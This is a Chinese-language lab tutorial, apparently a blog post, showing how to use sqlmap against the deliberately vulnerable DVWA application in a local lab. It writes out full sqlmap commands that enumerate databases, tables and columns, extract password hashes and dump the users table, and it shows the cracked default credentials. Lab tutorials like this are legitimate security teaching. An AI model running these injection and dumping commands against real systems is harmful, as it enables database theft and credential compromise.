sqlmap注入

1.概述用VirtualBox搭建kali

1-1.点击设置
在这里插入图片描述

1-2.注意:网络要打上勾,否则系统启动时没有连接到网卡
在这里插入图片描述

1-3.打开网络的接入网线,否则不能连接网卡上网
在这里插入图片描述
在这里插入图片描述

1-4.连接方式,我选择网络地址转换(NAT),因为可以上外网,也可以连接局域网
在这里插入图片描述

2.更多渗透测试文章参考

请看以下链接:

渗透测试的学习

3.概述用VMware Workstation搭建DVWA

我为了方便,用shell脚本部署,请参考以下链接:

Shell脚本部署DVWA

4.拓扑图的展示

在这里插入图片描述

5.设置DVWA的安全等级

5-1.点击DVWA Security
在这里插入图片描述

5-2.设置安全等级为low(最低级),然后点击提交(Submit)
在这里插入图片描述

6.提交DVWA的注入点,进行渗透测试

6-1.点击SQL Injection
在这里插入图片描述

6-2.提交ID为10的注入点
在这里插入图片描述

6-3.查看你URL的链接发生了变化
在这里插入图片描述

7.使用sqlmap检索DVWA数据库和用户

7-1查看Kali的IP地址

7-2.ping一下DVWA服务的IP地址是否能通
在这里插入图片描述

7-3.在浏览器打开F12–>点击Network–>点击?id=10&Submit=Submit–>查看Cookie值
在这里插入图片描述
在这里插入图片描述

7-4.进行sqlmap注入
在这里插入图片描述

sqlmap -u "http://172.25.0.100/DVWA-master/vulnerabilities/sqli/?id=10&Submit=Submit#" --cookie='security=low; PHPSESSID=ijkekge8a2dci3cqco97hnt116' -b --current-db --current-user
参数说明:
--cookie : 是某些网站为了辨别用户身份,进行Session跟踪而储存在用户本地终端上的数据(通常经过加密),由用户客户端计算机暂时或永久保存的信息
-u : 指定目标URL,syql注入点
-b : 获取DBMS banner(DBMS:Database Management System 数据库管理系统)
--current-db : 获取当前数据库
--current-user :获取当前用户

7-5.查看到DVWA的用户和数据库的信息,一直选着y就行了
在这里插入图片描述

8.使用salmap枚举用户和用户密码
sqlmap -u "http://172.25.0.100/DVWA-master/vulnerabilities/sqli/?id=10&Submit=Submit#" --cookie='security=low; PHPSESSID=ijkekge8a2dci3cqco97hnt116' --users --password
参数说明:
--users : 枚举DBMS用户
--password : 枚举DBMS用户密码的MD5

8-1.查看枚举用户和用户密码的MD5
在这里插入图片描述

8-2.选择字典,1为默认系统自带的字典,2自定义字典,3带有字典的文件
在这里插入图片描述

8-3.可以查看到用户的密码
在这里插入图片描述

9.使用sqlmap枚举用户所有的数据库名称
sqlmap -u "http://172.25.0.100/DVWA-master/vulnerabilities/sqli/?id=10&Submit=Submit#" --cookie='security=low; PHPSESSID=ijkekge8a2dci3cqco97hnt116' --dbs
参数说明:
--dbs 枚举DBMS中的所有数据库

9-1.查看数据库名
在这里插入图片描述

10.使用sqlmap枚举DVWA的数据表
sqlmap -u "http://172.25.0.100/DVWA-master/vulnerabilities/sqli/?id=10&Submit=Submit#" --cookie='security=low; PHPSESSID=ijkekge8a2dci3cqco97hnt116' -D dvwa --tables
参数说明:
-D 指定枚举的DBMS数据库
--tables 枚举DBMS数据库中的数据表

10-1.查看dvwa的数据库中的数据表
在这里插入图片描述

11.使用sqlmap枚举数据表中的字段
sqlmap -u "http://172.25.0.100/DVWA-master/vulnerabilities/sqli/?id=10&Submit=Submit#" --cookie='security=low; PHPSESSID=ijkekge8a2dci3cqco97hnt116' -D dvwa -T users --columns
参数说明:
-T : 指定枚举的DBMS数据表
--columns : 枚举DBMS数据表中的所有字段

11-1.查看dvwa数据库中的users数据表中的字段
在这里插入图片描述

12.拖库
sqlmap -u "http://172.25.0.100/DVWA-master/vulnerabilities/sqli/?id=10&Submit=Submit#" --cookie='security=low; PHPSESSID=ijkekge8a2dci3cqco97hnt116' -D dvwa -T users -C user,password --dump
参数说明:\
-D: 指定枚举的DBMS数据库
-T: 指定枚举的DBMS数据表
-C: 要枚举的DBMS数据表中的列(数据)
--dump: 转储DBMS数据表项

12-1.选择字典,1为默认系统自带的字典,2自定义字典,3带有字典的文件
在这里插入图片描述
12-2.这里我选着了默认字典
在这里插入图片描述
12-3.查看user和password字段的数据
在这里插入图片描述

#拖库成功,可以查看到数据的文件
cat /root/.sqlmap/output/172.25.0.100/dump/dvwa/users.csv
user,password
1337,8d3533d75ae2c3966d7e0d4fcc69216b (charley)
admin,5f4dcc3b5aa765d61d8327deb882cf99 (password)
gordonb,e99a18c428cb38d5f260853678922e03 (abc123)
pablo,0d107d09f5bbe40cade3de5c71e9e9b7 (letmein)
smithy,5f4dcc3b5aa765d61d8327deb882cf99 (password)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

路来了

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值